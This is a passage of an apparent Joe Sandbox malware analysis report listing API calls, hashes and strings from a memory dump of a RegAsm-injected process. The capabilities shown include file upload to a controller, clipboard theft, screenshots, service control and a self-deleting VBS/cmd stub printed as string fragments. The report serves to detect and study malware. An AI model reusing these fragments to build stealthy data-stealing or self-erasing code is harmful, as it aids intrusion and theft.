                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                  • String ID: Close
                                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                  • API String ID: 3086580692-2582957567
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                  • _free.LIBCMT ref: 0045137F
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 004513A1
                                                                                                                                  • _free.LIBCMT ref: 004513B6
                                                                                                                                  • _free.LIBCMT ref: 004513C1
                                                                                                                                  • _free.LIBCMT ref: 004513E3
                                                                                                                                  • _free.LIBCMT ref: 004513F6
                                                                                                                                  • _free.LIBCMT ref: 00451404
                                                                                                                                  • _free.LIBCMT ref: 0045140F
                                                                                                                                  • _free.LIBCMT ref: 00451447
                                                                                                                                  • _free.LIBCMT ref: 0045144E
                                                                                                                                  • _free.LIBCMT ref: 0045146B
                                                                                                                                  • _free.LIBCMT ref: 00451483
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  APIs
  • ___free_lconv_mon.LIBCMT ref: 10007D06
    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
  • _free.LIBCMT ref: 10007CFB
    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
  • _free.LIBCMT ref: 10007D1D
  • _free.LIBCMT ref: 10007D32
  • _free.LIBCMT ref: 10007D3D
  • _free.LIBCMT ref: 10007D5F
  • _free.LIBCMT ref: 10007D72
  • _free.LIBCMT ref: 10007D80
  • _free.LIBCMT ref: 10007D8B
  • _free.LIBCMT ref: 10007DC3
  • _free.LIBCMT ref: 10007DCA
  • _free.LIBCMT ref: 10007DE7
  • _free.LIBCMT ref: 10007DFF
Memory Dump Source
  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
  • String ID:
  • API String ID: 161543041-0
  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
APIs
    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
  • ExitProcess.KERNEL32 ref: 0040D9FF
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$P2$Temp$exepath$open
  • API String ID: 1913171305-73741400
  • Opcode ID: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
  • Opcode Fuzzy Hash: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID: _free
  • String ID:
  • API String ID: 269201875-0
  • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
  • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
APIs
    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
  • GetLastError.KERNEL32 ref: 00455D6F
  • __dosmaperr.LIBCMT ref: 00455D76
  • GetFileType.KERNEL32 ref: 00455D82
  • GetLastError.KERNEL32 ref: 00455D8C
  • __dosmaperr.LIBCMT ref: 00455D95
  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
  • CloseHandle.KERNEL32(?), ref: 00455EFF
  • GetLastError.KERNEL32 ref: 00455F31
  • __dosmaperr.LIBCMT ref: 00455F38
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
  • String ID: H
  • API String ID: 4237864984-2852464175
  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID: _free
  • String ID: \&G$\&G$`&G
  • API String ID: 269201875-253610517
  • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
  • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
  • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
  • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID:
  • String ID: 65535$udp
  • API String ID: 0-1267037602
  • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
  • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
  • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
  • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
APIs
  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
  • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
  • __dosmaperr.LIBCMT ref: 0043A926
  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
  • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
  • __dosmaperr.LIBCMT ref: 0043A963
  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
  • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
  • __dosmaperr.LIBCMT ref: 0043A9B7
  • _free.LIBCMT ref: 0043A9C3
  • _free.LIBCMT ref: 0043A9CA
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
  • String ID:
  • API String ID: 2441525078-0
  • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
  • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
  • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
  • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
APIs
  • __EH_prolog.LIBCMT ref: 0041A04A
  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
  • Sleep.KERNEL32(000003E8), ref: 0041A18E
  • GetLocalTime.KERNEL32(?), ref: 0041A196
  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
Memory Dump Source
  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
  • String ID: 8)3$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
  • API String ID: 489098229-1692321232
  • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
  • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                  • GetMessageA.USER32 ref: 0040556F
                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                                  • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                  • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                                                                  • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                                                                                                  • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                                  • String ID: 0VG$0VG$<$@$Temp
                                                                                                                                  • API String ID: 1704390241-2575729100
                                                                                                                                  • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                  • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                  APIs
                                                                                                                                  • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                                                  • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                  • String ID: !D@
                                                                                                                                  • API String ID: 2172192267-604454484
                                                                                                                                  • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                  • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                                                                  • _free.LIBCMT ref: 00448203
                                                                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                                  • _free.LIBCMT ref: 10005A22
